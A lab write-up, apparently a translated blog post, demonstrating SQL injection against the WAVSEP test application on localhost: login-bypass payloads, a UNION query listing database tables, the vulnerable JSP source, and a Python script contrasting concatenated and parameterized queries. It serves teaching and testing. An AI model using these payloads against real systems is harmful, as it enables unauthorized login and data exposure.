[WAVSEP] SQL Injection

Notes

  • Environment
    Ubuntu 18.04.1
    Linux version 4.15.0-46-generic
    tomcat8
    mysql5.7

  • Test target
    wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/

Let's get started

1. SQL injection case 1
Open the SQL injection page for this round (case 1 under GET500 in wavsep):

http://127.0.0.1:8080/wavsep/SInjection-Detection-Evaluation-GET-500Error/Case1-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2

The page shows "login failed".

Then insert the injection string 'or'7'='7 into both the username and password fields to try to bypass the login:

http://127.0.0.1:8080/wavsep/SInjection-Detection-Evaluation-GET-500Error/Case1-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username='or'7'='7&password='or'7'='7

The page shows "hello user1".
Other payloads:

Exploit (both input fields): 'or'7'='7
Independent Exploit 1: ' or 7=7--%20
Independent Exploit 2: ' or 7=7#%20
Independent Exploit 3: ' or 7=7/*%20

Source analysis:
Reference: http://www.sec-redclub.com/archives/763/

String username = request.getParameter("username");
String password = request.getParameter("password");

// Both request parameters are concatenated straight into the SQL text,
// so a quote inside either value changes the structure of the query.
String SqlString =
        "SELECT username, password " +
        "FROM users " +
        "WHERE username='" + username + "'" +
        " AND password='" + password + "'";

From the successful login above ('or'7'='7) we can see that the SQL query becomes: select username,password from users where username=''or'7'='7' and password=''or'7'='7'. The injected '7'='7' comparison is always true, so the WHERE clause matches regardless of the real username and password: when the username condition, or the username and password conditions together, evaluate to true the query succeeds, otherwise it fails. This is how a crafted value, combined into the query string, turns into a successful injection.
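As an added example that is not part of the original post, the following Python script models the JSP's string concatenation against an in-memory SQLite stand-in for the users table (the real WAVSEP target runs MySQL; the table contents here are constructed) and puts the parameterized form of the same query beside it, which is the fix for this class of bug:

```python
import sqlite3


def make_db():
    # Constructed in-memory users table standing in for WAVSEP's MySQL table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("user1", "pass1"), ("user2", "pass2")])
    return conn


def build_vulnerable_sql(username, password):
    # Mirrors the JSP's concatenation: the values become part of the SQL text.
    return ("SELECT username, password FROM users WHERE username='" + username
            + "' AND password='" + password + "'")


def login_vulnerable(conn, username, password):
    # Executes the concatenated query; returns the matched username or None.
    rows = conn.execute(build_vulnerable_sql(username, password)).fetchall()
    return rows[0][0] if rows else None


def login_parameterized(conn, username, password):
    # Same query, but the values travel as bind parameters, never as SQL text,
    # so a quote in the input is just data and cannot alter the WHERE clause.
    rows = conn.execute(
        "SELECT username, password FROM users WHERE username=? AND password=?",
        (username, password)).fetchall()
    return rows[0][0] if rows else None


if __name__ == "__main__":
    conn = make_db()
    payload = "'or'7'='7"
    print(build_vulnerable_sql(payload, payload))
    print("vulnerable:", login_vulnerable(conn, payload, payload))        # user1
    print("parameterized:", login_parameterized(conn, payload, payload))  # None
```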

2. SQL injection case 2
Case 2 under GET500 in wavsep: http://127.0.0.1:8080/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp?msg=textvalue
Since the backend is MySQL, replace the value of msg with

' UNION SELECT 1, table_name, 'jfks' FROM information_schema.tables--%20

which gives

http://127.0.0.1:8080/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp?msg=' UNION SELECT 1, table_name, 'jfks' FROM information_schema.tables--%20

Result: OK.
